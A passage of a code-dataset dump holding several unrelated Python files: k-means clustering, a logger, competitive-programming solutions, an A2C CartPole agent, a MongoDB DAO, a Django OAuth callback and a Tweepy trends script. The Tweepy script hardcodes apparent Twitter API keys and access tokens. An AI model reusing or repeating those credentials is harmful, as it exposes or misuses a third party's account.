True\n while flag:\n index = random.randint(0, d_in.shape[0] - 1)\n flag = bool(np.size(np.where(record == index)) != 0) # random point already exists?\n record = np.hstack((record, index))\n centroids = np.vstack((centroids, d_in[index]))\n return centroids\n\n\ndef kMeans(d_in, w, k):\n \"\"\"\n this function implements the following function:\n K-means clustering algorithm\n :param d_in: input data [[x1,y1,...],[x2,y2,...],....,[xn,yn,...]]\n :param k: clustering number\n :return: centroids[[class 1, pos 2],[class 2, pos 2]...], result[[point 1, dis 1], [point2, dis2],...]\n \"\"\"\n m = np.shape(d_in)[0]\n result = np.zeros((m, 2)) # store the clustering result [[class1,dis1],...,[classn,disn]]\n centroids = randCent(d_in, k) # generate random centers for different classes\n flag = True # to judge whether the clustering process has converged\n count = 1\n while flag:\n flag = False\n print('\\t' + 'iteration: %s' % count)\n for i in range(m): # assign points to their nearest class\n min_dist = inf\n min_ind = -1\n for j in range(k):\n distJI = dist(centroids[j, :], d_in[i, :], w)\n if distJI < min_dist:\n min_dist = distJI\n min_ind = j\n if result[i, 0] != min_ind:\n flag = True # if change exists, continue iteration process\n result[i, :] = min_ind, min_dist ** 2\n for cent in range(k): # recalculate center points for different classes\n ptsInClust = d_in[np.nonzero(result[:, 0] == cent)[0]]\n centroids[cent, :] = np.mean(ptsInClust, axis=0)\n count = count + 1\n return centroids, result\n\n\ndef 
clu_plot(cate, cor):\n \"\"\"\n this function implements the following function:\n save the clustering result figure as 'figure/clustering_result.png'\n :param cate:\n :param cor:\n :return:\n \"\"\"\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(cor[:, 0], cor[:, 1], cor[:, 2], c=cate)\n ax.set_zlabel('original price', fontdict={'size': 15, 'color': 'red'})\n ax.set_ylabel('attribute 2', fontdict={'size': 15, 'color': 'red'})\n ax.set_xlabel('attribute 1', fontdict={'size': 15, 'color': 'red'})\n plt.show()\n plt.savefig('figure/clustering_result.png')\n\n\ndef kmeans_clustering(d_in, type='Unweighted', num=c_num, save=True):\n \"\"\"\n this function implements the following function:\n combine the above functions and form an executable function\n :return: None\n \"\"\"\n data = np.array(d_in)[:, 1:]\n if type == 'Weighted': # 有权聚类\n weight = np.array(d_in.columns.values[1:]).astype(float)\n elif type == 'Unweighted': # 无权聚类\n weight = np.ones((1, data.shape[1])).reshape(-1)\n else:\n raise TypeError('Unrecognized clustering type')\n nor_fea = normal(data) # normalize feature value\n myCentroids, result = kMeans(nor_fea, weight, num)\n d_out = np.hstack((np.zeros((np.array(d_in).shape[0], 1)), np.array(d_in)))\n d_out = np.vstack((np.zeros((1, d_out.shape[1])), d_out))\n d_out[0, 0] = 'Cate'\n d_out[0, 1:] = d_in.columns.values\n d_out[1:, 0] = result[:, 0]\n if save:\n # np.savetxt(save_path + 'classifier/KMeans_result.csv', d_out, fmt='%s', delimiter=',')\n pd.DataFrame(d_out).to_csv(save_path + 'classifier/KMeans_result.csv', header=0, index=0)\n print(\"result saved in \" + save_path + 'classifier/KMeans_result.csv')\n return myCentroids, result\n\n\ndef best_k(d_in):\n record = inf\n bestk = 0\n weight = np.array(d_in.columns.values[1:]).astype(float)\n for k in range(2, 7):\n c, r = kmeans_clustering(d_in, save=False, num=k) # 在k个类别下进行聚类\n sum = 0\n for i in range(k):\n for j in range(i, k):\n sum = sum + dist(c[i, :], c[j, :], weight)\n r_out = 2 * sum / (k * (k - 1)) # 类间距离(希望max)\n r_in = np.sum(np.sqrt(r[:, :])) # 类内距离(希望min)\n judge = r_in / r_out\n if record > judge:\n record = judge\n bestk = k\n print('dis for k=%d is %f, ' % (k, judge) + 'best dis is %f, ' % record + 'best k is %d' % bestk)\n print('best k in interval [2,7] is %d' % bestk)\n return bestk\n","sub_path":"Classifier/kmeans_utils.py","file_name":"kmeans_utils.py","file_ext":"py","file_size_in_byte":6379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
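A hypothetical call pattern for these utilities (note the unusual convention the code relies on: the first DataFrame column is an identifier, and with type='Weighted' the remaining column names must parse as float feature weights; all names and values here are illustrative):

    import pandas as pd
    df = pd.DataFrame({'id':  [1, 2, 3, 4],
                       '1.0': [10.0, 20.0, 30.0, 40.0],  # feature weighted 1.0
                       '0.5': [5.0, 1.0, 2.0, 8.0]})     # feature weighted 0.5
    centroids, result = kmeans_clustering(df, type='Weighted', num=2, save=False)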
+{"seq_id":"568492101","text":"import os\nimport sys\nimport logging\nimport logging.handlers\nimport logging.config\nfrom .Connection import Connection\nfrom .CreatLogName import log_name\n\n\nclass Logger(object):\n def __init__(self,\n set_level=\"INFO\",\n config_file_path=\"../PyFramework/LogCenter/config.ini\"):\n \"\"\"\n :param set_level: 日志级别[\"NOTSET\"|\"DEBUG\"|\"INFO\"|\"WARNING\"|\"ERROR\"|\"CRITICAL\"],默认为INFO\n \"\"\"\n \"\"\"关联配置文件和获得配置信息\"\"\"\n cfp = Connection(config_file_path)\n name = os.path.split(os.path.splitext(sys.argv[0])[0])[-1] # 程序项目名\n formatter = cfp.get_info(\"log\", \"log_format\") # 格式,不包括msg且不能包含被调用位置文件名/函数名/行数\n log_file_path = cfp.get_info(\"log\", \"log_path\") # 获取输出日志文件地址\n use_console = int(cfp.get_info(\"log\", \"log_use_console\")) # 获取是否获得控制台信息\n use_http = int(cfp.get_info(\"handler\", \"http_use\")) # 是否使用http发送\n log_file_name = log_name.check_new(config_file_path) # 本次输出的日志文件名\n\n if not set_level:\n set_level = self._exec_type() # 设置set_level为None,自动获取当前运行模式\n self.__logger = logging.getLogger(name)\n self.setLevel(\n getattr(logging, set_level.upper()) if hasattr(logging, set_level.upper()) else logging.INFO) # 设置日志级别\n if not os.path.exists(log_file_path): # 创建日志目录\n os.makedirs(log_file_path)\n formatter = logging.Formatter(formatter)\n handler_list = list()\n handler_list.append(logging.FileHandler(os.path.join(log_file_path, log_file_name), encoding=\"utf-8\"))\n if use_console: # 是否使用控制台\n handler_list.append(logging.StreamHandler())\n if use_http: # 是否使用http发送\n handler_list.append(\n logging.handlers.HTTPHandler(\n cfp.get_info(\"handler\", \"http_handler_host\"),\n cfp.get_info(\"handler\", \"http_handler_url\"),\n method=cfp.get_info(\"handler\", \"http_handler_method\"),\n secure=cfp.get_info(\"handler\", \"http_handler_secure\"),\n credentials=(cfp.get_info(\"handler\", \"http_handler_credentials_fir\"),\n cfp.get_info(\"handler\", \"http_handler_credentials_sec\")),\n context=cfp.get_info(\"handler\", \"http_handler_context\"))\n )\n for handler in handler_list:\n handler.setFormatter(formatter)\n self.addHandler(handler)\n self.handler_list = handler_list\n self.formatter = formatter\n\n def __del__(self):\n \"\"\"使用过后清楚handler,避免重复声明\"\"\"\n for handler in self.handler_list:\n handler.setFormatter(self.formatter)\n self.__logger.removeHandler(handler)\n\n def __getattr__(self, item):\n return getattr(self.logger, item)\n\n @property\n def logger(self):\n return self.__logger\n\n @logger.setter\n def logger(self, func):\n self.__logger = func\n\n @staticmethod\n def _exec_type():\n return \"DEBUG\" if os.environ.get(\"IPYTHONENABLE\") else \"INFO\"\n\n @staticmethod\n def gettype(level_value, msg):\n \"\"\"\n 用于获取该日志消息类型\n 在原有的[\"NOTSET\"|\"DEBUG\"|\"INFO\"|\"WARNING\"|\"ERROR\"|\"CRITICAL\"]基础上新添加不同的类型\n 0 : 单输出文字消息\n 1 : 带数据输出消息(验证数据是否正确)数据以字典传入\n :return:\n \"\"\"\n new_msg = \"\"\n if level_value % 10 == 1:\n new_msg = \"Verification:\"\n for key, value in msg.items():\n new_msg += str(key) + \"=\" + str(value) + \",\"\n new_msg = new_msg[:-1]\n if level_value % 10 == 0:\n new_msg = msg\n msg = \"[\" + new_msg + \"]\"\n return msg\n","sub_path":"LogCenter/Center/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"76165967","text":"import sys\nsys.setrecursionlimit(1 << 20)\nINF = float('inf')\n\n\ndef read_int_list():\n return list(map(int, input().split()))\n\n\ndef read_ints():\n return map(int, input().split())\n\n\ndef dfs(worker_id, children):\n if not children[worker_id]: # no subordinate\n return 1\n\n min_s, max_s = INF, -INF\n for subordinate_id in children[worker_id]:\n s = dfs(subordinate_id, children)\n min_s = min(min_s, s)\n max_s = max(max_s, s)\n\n return min_s + max_s + 1\n\n\ndef main():\n N = int(input())\n children = [[] for _ in range(N)]\n for i in range(1, N):\n i_boss = int(input())\n i_boss -= 1\n children[i_boss].append(i)\n\n print(dfs(0, children))\n\n\nmain()\n","sub_path":"abc/abc26c.py","file_name":"abc26c.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"604853184","text":"import numpy as np\n\nfrom learn_selection.core import (infer_general_target,\n normal_sampler,\n logit_fit,\n probit_fit)\n\ndef simulate(n=100):\n\n # description of statistical problem\n\n truth = np.array([2. , -2.]) / np.sqrt(n)\n\n data = np.random.standard_normal((n, 2)) + np.multiply.outer(np.ones(n), truth) \n S = np.mean(data, 0)\n observed_sampler = normal_sampler(S, 1/n * np.identity(2)) \n\n def selection_algorithm(sampler):\n min_success = 1\n ntries = 3\n success = 0\n for _ in range(ntries):\n noisyS = sampler(scale=0.5)\n success += noisyS.sum() > 0.2 / np.sqrt(n)\n return success >= min_success\n\n # run selection algorithm\n\n observed_outcome = selection_algorithm(observed_sampler)\n\n # find the target, based on the observed outcome\n\n if observed_outcome: # target is truth[0]\n (true_target, \n observed_target, \n target_cov, \n cross_cov) = (truth[0], \n S[0], \n 1./n * np.identity(1), \n np.array([1., 0.]).reshape((2,1)) / n)\n else:\n (true_target, \n observed_target, \n target_cov, \n cross_cov) = (truth[1], \n S[1], \n 1./n * np.identity(1), \n np.array([0., 1.]).reshape((2,1)) / n)\n\n pivot, interval = infer_general_target(selection_algorithm,\n observed_outcome,\n observed_sampler,\n observed_target,\n cross_cov,\n target_cov,\n hypothesis=true_target,\n fit_probability=probit_fit)[:2]\n\n return pivot, (interval[0] < true_target) * (interval[1] > true_target), interval[1] - interval[0]\n\nif __name__ == \"__main__\":\n import statsmodels.api as sm\n import matplotlib.pyplot as plt\n \n n = 100\n U = np.linspace(0, 1, 101)\n P, L = [], []\n plt.clf()\n coverage = 0\n for i in range(300):\n p, cover, l = simulate(n=n)\n coverage += cover\n P.append(p)\n L.append(l)\n print(np.mean(P), np.std(P), np.mean(L) / (2 * 1.65 / np.sqrt(n)), coverage / (i+1))\n\n plt.clf()\n plt.plot(U, sm.distributions.ECDF(P)(U), 'r', linewidth=3)\n plt.plot([0,1], [0,1], 'k--', linewidth=2)\n plt.show()\n","sub_path":"examples/standalone/cleaner_basic_example.py","file_name":"cleaner_basic_example.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"380489118","text":"import os\r\nimport sys\r\nfrom PyQt5.QtWidgets import *\r\n\r\nfrom RESULT.gui.ui_standart_window import Ui_Dialog\r\nfrom RESULT.gui.window1 import window1\r\nfrom RESULT.gui.window2 import window2\r\nfrom RESULT.gui.window3 import window3\r\n\r\n\r\nclass Example(QMainWindow, Ui_Dialog):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.nextButton.clicked.connect(self.nextWindow)\r\n self.win1 = window1(self)\r\n\r\n # pixmap = QPixmap('C:/Users/Ibrag/OneDrive/Изображения/Saved Pictures/1.jpg')\r\n # pixmap = pixmap.scaledToWidth(520)\r\n # scene = QGraphicsScene()\r\n # self.regionCoference_graphicsView.setScene(scene)\r\n # scene.addPixmap(pixmap)\r\n\r\n def nextWindow(self):\r\n self.windows.setCurrentIndex(self.windows.currentIndex() + 1)\r\n self.nextButton.setEnabled(False)\r\n self.editingIntervals_pushButton.setVisible(False)\r\n if self.nextButton.text() == \"Далее\" and self.windows.currentIndex() == 1:\r\n self.win2 = window2(self, self.win1.main_Processing)\r\n if self.nextButton.text() == \"Далее\" and self.windows.currentIndex() == 2:\r\n self.win3 = window3(self, self.win1.main_Processing, self.win2.intervals_not_presenter)\r\n if self.nextButton.text() == \"Завершить\":\r\n if self.saveAllIntervalsInFiles_checkBox.isChecked():\r\n pathResult = self.win1.main_Processing.audioProcessing.pathVideo + \"Result/\"\r\n if not os.path.exists(pathResult):\r\n os.makedirs(name=pathResult)\r\n else:\r\n for file in os.listdir(pathResult):\r\n os.remove(pathResult + file)\r\n textIntervals = self.textBox_intervalsSilence.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsSilence.txt\",\r\n intervals=textIntervals)\r\n textIntervals = self.textBox_intervalsPresenter.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsPresenter.txt\",\r\n intervals=textIntervals)\r\n textIntervals = self.textBox_intervalsSomeone.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsSomeone.txt\",\r\n intervals=textIntervals)\r\n textIntervals = self.textBox_intervalsTogether.toPlainText()\r\n if textIntervals != 'No!':\r\n self.saveIntervalsInFile(path_name=pathResult + \"intervalsTogether.txt\",\r\n intervals=textIntervals)\r\n QMessageBox.about(self, \"Успешно!\", \"Интервалы успешно сохранены в файлы!\\n\")\r\n sys.exit()\r\n\r\n def saveIntervalsInFile(self, path_name, intervals):\r\n f = open(path_name, 'w')\r\n for interval in intervals.split('\\n'):\r\n if len(interval) > 0:\r\n f.write(interval + '\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication([])\r\n form = Example()\r\n form.show()\r\n app.exec()\r\n","sub_path":"Code Python/Project/RESULT/gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"3407282","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport sys, os\nimport numpy as np\nparent_dir=os.getcwd()\npath= os.path.dirname(parent_dir)\nsys.path.append(path)\n\nfrom pymongo import MongoClient\nfrom conexionMongo import *\n\nfrom datetime import datetime\nimport dateutil.parser\n\ndef getTweetsClasificados(entrena_ini, entrena_fin):\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollEntrenado()\n tweetsEntrenados = db[coleccion]\n\n entrena_ini = entrena_ini + ' 00:00:00'\n entrena_ini=datetime.strptime(entrena_ini,\"%Y-%m-%d %H:%M:%S\")\n\n entrena_fin = entrena_fin + ' 23:59:59'\n entrena_fin=datetime.strptime(entrena_fin,\"%Y-%m-%d %H:%M:%S\")\n\n tw = tweetsEntrenados.find({\n 'fechaTweet':{\n '$gte': entrena_ini,\n '$lt': entrena_fin\n }\n })\n\n return list(tw)\n\ndef getTweetsClasificadosMM(fechaini,fechafin):\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollEntrenado()\n tweetsEntrenados = db[coleccion]\n\n #idt=[]\n texto=[]\n categoria=[]\n fechaini=datetime.strptime(fechaini,\"%Y-%m-%d\")\n fechafin=datetime.strptime(fechafin,\"%Y-%m-%d\")\n #for text in tweetsdb.find({\"idioma\":\"es\",\"consulta\": \"@AjuntamentVLC\", \"fechaDescarga\":\"22-03-17\"},{\"idt\":1,\"tweet\":1,\"_id\":0}) :\n for text in tweetsEntrenados.find({\"fechaTweet\":{ \"$gt\" :fechaini ,\"$lt\" :fechafin}},{\"categoria\":1,\"texto\":1,\"_id\":0}) :\n categoria.append(str(text['categoria'].encode('utf-8')))\n texto.append(str(text['texto'].encode('utf-8')))\n\n return texto,categoria\n\ndef addClasificador(nombre, accMedio, desviacion, entrena_ini, entrena_fin):\n\n entrena_ini = entrena_ini + ' 00:00:00'\n entrena_ini=datetime.strptime(entrena_ini,\"%Y-%m-%d %H:%M:%S\")\n\n entrena_fin = entrena_fin + ' 23:59:59'\n entrena_fin=datetime.strptime(entrena_fin,\"%Y-%m-%d %H:%M:%S\")\n\n modelo = {\n 'nombre': nombre,\n 'accuracy': accMedio,\n 'desviacion': desviacion,\n 'entrena_ini': entrena_ini,\n 'entrena_fin': entrena_fin,\n 'fecha_creacion': datetime.now(),\n 'predeterminado': False\n }\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n clasificadores = db[coleccion]\n\n post_id = clasificadores.insert(modelo)\n\ndef getClasificadores():\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n clasificadores = cursor.find({})\n\n return list(clasificadores)\n\n\ndef eliminarClasificadorDAO(nombre):\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n\n\n result = cursor.delete_one({'nombre': nombre})\n\n if result.deleted_count != 1:\n raise Exception('Ha fallado el eliminar el clasificador ' + nombre)\n\n\ndef getClasiDefecto():\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n clasificador = cursor.find({\n 'predeterminado': True\n }).limit(1)\n\n return ((list(clasificador))[0])['nombre']\n\n\ndef editarClasificadorDAO(nombreOri, nombreNuev):\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n\n clasificador 
=cursor.find_one({'nombre':nombreOri})\n reg_id=clasificador['_id']\n\n result = cursor.update_one(\n {'_id':reg_id},\n {'$set':{\n 'nombre':nombreNuev\n }\n }\n )\n\ndef updateClasificador(nombre, accMedio, desviacion, entrena_ini, entrena_fin):\n\n entrena_ini = entrena_ini + ' 00:00:00'\n entrena_ini=datetime.strptime(entrena_ini,\"%Y-%m-%d %H:%M:%S\")\n entrena_fin = entrena_fin + ' 23:59:59'\n entrena_fin=datetime.strptime(entrena_fin,\"%Y-%m-%d %H:%M:%S\")\n\n conexion = getConexion()\n client = MongoClient(conexion)\n tdb = getDB()\n db = client[tdb]\n\n coleccion = getCollClasificadores()\n cursor = db[coleccion]\n\n clasificador =cursor.find_one({'nombre':nombre})\n reg_id=clasificador['_id']\n\n result = cursor.update_one(\n {'_id':reg_id},\n {'$set':{\n 'accuracy': accMedio,\n 'desviacion': desviacion,\n 'entrena_ini': entrena_ini,\n 'entrena_fin': entrena_fin,\n 'fecha_creacion': datetime.now()\n }\n }\n )\n","sub_path":"DAO/administrarClasificadoresDAO.py","file_name":"administrarClasificadoresDAO.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
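A hypothetical round trip through the DAO above (assumes the conexionMongo helpers are configured; the name, metrics and dates are illustrative):

    addClasificador('svm_v1', 0.87, 0.03, '2017-01-01', '2017-03-31')
    for c in getClasificadores():
        print(c['nombre'], c['accuracy'], c['entrena_ini'])
    eliminarClasificadorDAO('svm_v1')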
+{"seq_id":"212114341","text":"\r\nimport sys\r\nimport json\r\nimport tweepy\r\nimport yweather\r\nimport pprint\r\n\r\n\r\n# Authenticate to Twitter\r\nauth = tweepy.OAuthHandler(\"G9Rtluy2antY7VS4AJrZKKIw4\", \"6TvT2Pv4xH7wlinY3grouP2FBBG5Q99LvkL2vWrR1zWzelB5Q5\")\r\nauth.set_access_token(\"1254018042511622144-LJjE1f57lVoIK5Dtt7B5pfH76qFecY\", \"mDcYFQrOl7K6vOdQh7xapuXpNTY9pwRr2FG3YBp1ogmHE\")\r\n\r\n# Create API object\r\napi = tweepy.API(auth, wait_on_rate_limit=True,\r\n wait_on_rate_limit_notify=True)\r\n\r\n# calling the data from the json file to get woeid id\r\ncountry=input(\"enter a country\")\r\nCountry_WOE_ID=None\r\ninput_file = open('trends-locations.json')\r\ndata = json.load(input_file) # get the data list\r\nfor element in data:\r\n if (element['country'].lower() == country):\r\n id = element['parentid']\r\n print (id)\r\n Country_WOE_ID = id\r\n break # print it\r\n\r\n# check if country is exsists and printy trednds\r\n\r\nif Country_WOE_ID is not None:\r\n country_trends = api.trends_place(Country_WOE_ID)\r\n trends = json.loads(json.dumps(country_trends, indent=1))\r\n list=[]\r\n for trend in trends[0][\"trends\"]:\r\n print (trend[\"name\"])\r\n # list.append(trend[\"name\"])\r\n #print(list)\r\n# else print list of countries\r\nelse :\r\n print(\"wrong name choose one of these countries only \")\r\n country_list=[]\r\n for element in data:\r\n if(element['country'] in country_list):\r\n continue\r\n else:\r\n country_list.append(element['country'])\r\n for c in country_list:\r\n print(c)\r\n\r\n\r\n\r\n#trends_result = api.trends_place(1)\r\n#for trend in trends_result[0][\"trends\"]:\r\n #print(trend[\"name\"])\r\n","sub_path":"twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"365926516","text":"import gym\nimport numpy as np\n\nimport torch\nfrom torch.distributions.categorical import Categorical\nfrom torch.nn import functional as F\nimport torch.optim as optim\n\nfrom model import Agent\nfrom storage import Memory\nfrom algorithms import A2C_step\n\ndef fill_replay(env, agent, replay):\n \"\"\"\n This function uses our agent and our environemnt\n to fill our replay buffer.\n \"\"\"\n\n #initialize the env and convert the obs to torch\n obs = torch.from_numpy(env.reset()).float()\n\n #book keeping variables\n total_reward = 0\n current_reward = 0\n num_episodes = 0\n\n for i in range(replay._capacity):\n #see storage.py for details on the Memory class\n s0 = obs\n action_logits, value = agent(obs)\n\n \"\"\"\n for cartpole, we have two actions: left and right.\n the output of our neural network is just a vector of two numbers.\n we need to represent those numbers as probabilities, so they \n must be on [0,1] and sum to 1. \n \n now, we COULD just shift and normalize the output, but this is \n bad because we would like larger outputs to correspond to more \n confidence. if we just shift and norm, then only the relative \n ratio between the outputs will affect the confidence. to get around \n this we normalize after an exponential transform, which is known as the \n Softmax funciton: prob[i] = exp(outputs[i])/sum(exp(outputs)).\n\n once we have this vector of probabilities, we want to sample it \n to get the action. we could have used np.random.choice with a \n specific probability array, but the torch categorical distribution\n handles all the softmax crap for us internally, so we use that instead\n \"\"\"\n action = Categorical(logits = action_logits).sample()\n obs, rews, dones, infos = env.step(action.numpy())\n obs = torch.from_numpy(obs).float()\n current_reward += rews\n\n #now that we have our transition, we store it for later\n replay.remember(s0, \n action_logits, \n action, \n rews,\n value, \n dones)\n\n if dones:\n obs = torch.from_numpy(env.reset()).float()\n num_episodes += 1\n total_reward += current_reward\n print(\"episode \"+str(num_episodes)+\":\", current_reward)\n current_reward=0\n\n env.render()\n\n \"\"\"\n the infinite horizon stochastic return is defined by a sum over an \n infinate number of time steps. we obviously cannot do this, so we bootstrap\n the calculation using our value funciton to approximate the sum of the terms\n from N to infinity.\n \"\"\"\n _, final_value = agent(obs)\n replay.compute_returns(final_value) \n return total_reward/num_episodes \n\nif __name__==\"__main__\":\n \"\"\"\n cartPole-v0 is the environment. openai often registers multiple\n environments with slightly different parameters as different versions\n of that environment (in this case, v0 terminates after 200 steps, while\n v1 terminates after 500)\n \"\"\"\n env = gym.make('CartPole-v0')\n\n \"\"\"\n these can be exctracted from a general environment using \n openai spaces. in a general algorithm you would have a \n typecheck here for the space and then extract the \n shape from that space. 
\n \"\"\"\n numObs = 4\n numActions = 2\n\n \"\"\"\n the replay length in A2C is a hyperparameter.\n for simplicitly, I do not preform batching in this\n example but often times you will need to specify \n a batch and minibatch size as well\n \"\"\"\n memLength = 500\n hiddenSize = 32\n\n \"\"\"\n A2C is an \"offline\" algorithm, which means\n we collect transitions and then we batch train\n our models on that dataset like we would any other\n \"\"\"\n replay = Memory(memLength,4,2)\n obs = env.reset()\n env.render()\n \n \"\"\"\n the optimizer is generally a hyperparameter of a \n given RL algorithm. Adam is a common choice but \n it has stability issues in more complex environments. \n SGD is usually a safer bet. 1E-2 is an extremely \n fast learning rate, but we can get away with it for\n this environment\n \"\"\"\n agent = Agent(numObs, numActions, hiddenSize)\n optimizer = optim.Adam(agent.parameters(), 1E-3)\n\n for i in range(1000):\n \"\"\"\n we are going to execute 1000 epochs of training, \n though we really dont need to for cartpole. in \n each epoch, we collect our transitions by having \n the agent interact with the environment, and then\n we update the parameters of the agent\n \"\"\"\n mean_reward = fill_replay(env, agent, replay)\n actorLoss, criticLoss = A2C_step(optimizer, agent, replay)\n print(\"#####################################\")\n print(\"epoch: \", i)\n print(\"mean reward:\", mean_reward)\n print(\"actor loss: \", actorLoss)\n print(\"critic loss \", criticLoss)\n print(\"#####################################\")\n\n ","sub_path":"A2C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"585991507","text":"from django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nfrom accounts.models import *\nimport time\nimport urllib2\nimport urllib\nimport json\nfrom utils import SECURE_settings\nfrom django.shortcuts import redirect\nfrom django.conf import settings\nfrom documents import create_document\nfrom django.contrib.sessions.models import Session\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\n\ndef saveCode(code, user, scope):\n\tif PlatformCode.objects.filter(user=user).count() > 0:\n\t\treturn True\n\tc = PlatformCode.objects.create(code=code, user=user, time_generated=int(time.time()))\n\tfor s in scope:\n\t\tc.scope.add(PlatformScope.objects.get(key=s))\n\tc.save()\n\treturn True\n\ndef exchangeCodeForToken(code):\n\tvalues = {}\n\tvalues['code'] = code\n\tvalues['grant_type'] = 'authorization_code'\n\tvalues['client_id'] = SECURE_settings.PLATFORM['client_id']\n\tvalues['client_secret'] = SECURE_settings.PLATFORM['client_secret']\n\tvalues['redirect_uri'] = settings.PLATFORM['redirect_uri']\n\tdata = urllib.urlencode(values)\n\treq = urllib2.Request(settings.PLATFORM['platform_uri_token'], data)\n\ttry:\n\t\tresponse = urllib2.urlopen(req).read()\n\texcept urllib2.HTTPError as e: \n\t\tresponse = e.read()\n\t\treturn response\n\n\treturn json.loads(response)\n\t\ndef saveToken(user, token, code):\n\tc = PlatformCode.objects.get(code=code)\n\tt = PlatformAccessToken.objects.create(user = user, token = token['access_token'], token_type = token['token_type'], refresh_token = token['refresh_token'], expire = int(int(time.time()) + int(token['expires_in'])), code = c)\n\tfor s in token['scope'].split(','):\n\t\tt.scope.add(PlatformScope.objects.get(key=s))\n\tt.save()\n\n\tc.exchanged = True\n\tc.time_exchanged = int(time.time())\n\tc.save()\n\n\treturn True\n\ndef updateUserStatus(user):\n\ttry:\n\t\tparticipant = Participant.objects.get(user=user)\n\t\tparticipant.status = 'initiated'\n\t\tparticipant.save()\n\texcept Participant.DoesNotExist:\n\t\tparticipant = Participant.objects.create(user=user, status='initiated')\n\n\treturn True\n\t\n@login_required\ndef authorize(request):\n\ttry:\n\t\tsessions = Session.objects.filter(expire_date__gte=datetime.now())\n\t\tfor session in sessions:\n\t\t\tdata = session.get_decoded()\n\t\t\ttry: user = User.objects.filter(id=data.get('_auth_user_id', None))[0]\n\t\t\texcept: continue\n\t\t\tif request.user == user: session.delete()\n\texcept: pass\n\n\turl = settings.PLATFORM['platform_uri']+'oauth2/oauth2/authorize/'\n\turl += '?redirect_uri='+settings.PLATFORM['redirect_uri']\n\turl += '&scope='+'enroll'\n\turl += '&client_id='+SECURE_settings.PLATFORM['client_id']\n\turl += '&response_type='+'code'\n\t#return HttpResponse(url)\n\treturn redirect(url)\n\n@login_required\ndef callback(request):\n\terror = request.REQUEST.get('error', '')\n\tif not error == '':\n\t\treturn redirect(settings.PLATFORM['platform_uri']+'?status=auth_error')\n\n\tcode = request.REQUEST.get('code')\n\tscope = request.REQUEST.get('scope').split(',')\n\tuser = request.user\n\n\tsaveCode(code, user, scope)\n\ttoken = exchangeCodeForToken(code)\n\tif 'error' in token:\n\t\treturn redirect(settings.PLATFORM['platform_uri']+'?status=token_error')\n\tif not saveToken(user, token, code):\n\t\treturn redirect(settings.PLATFORM['platform_uri']+'?status=save_token_error')\n\t\n\tif 'enroll' in scope:\n\t\tcreate_document.createInformedConsent(user, 
'da')\n\t\n\t#return HttpResponse(json.dumps(scope))\n\treturn redirect(settings.PLATFORM['platform_uri']+'?status=success&message=You are now enrolled!')\n","sub_path":"sensible_data_service/platform_manager/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
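exchangeCodeForToken above performs a standard OAuth2 authorization-code exchange; the equivalent raw request (endpoint and values are placeholders drawn from the settings objects):

    POST <platform_uri_token> HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    code=<code>&grant_type=authorization_code&client_id=<client_id>&client_secret=<client_secret>&redirect_uri=<redirect_uri>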
+{"seq_id":"162447302","text":"\n# @Title: 删除有序数组中的重复项 (Remove Duplicates from Sorted Array)\n# @Author: 18015528893\n# @Date: 2021-02-19 11:37:02\n# @Runtime: 48 ms\n# @Memory: 15.7 MB\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n n = len(nums)\n i = 0\n for j in range(n):\n if nums[j] != nums[i]:\n i += 1\n nums[i] = nums[j]\n return i + 1\n\n\n","sub_path":"Problemset/remove-duplicates-from-sorted-array/remove-duplicates-from-sorted-array.py","file_name":"remove-duplicates-from-sorted-array.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
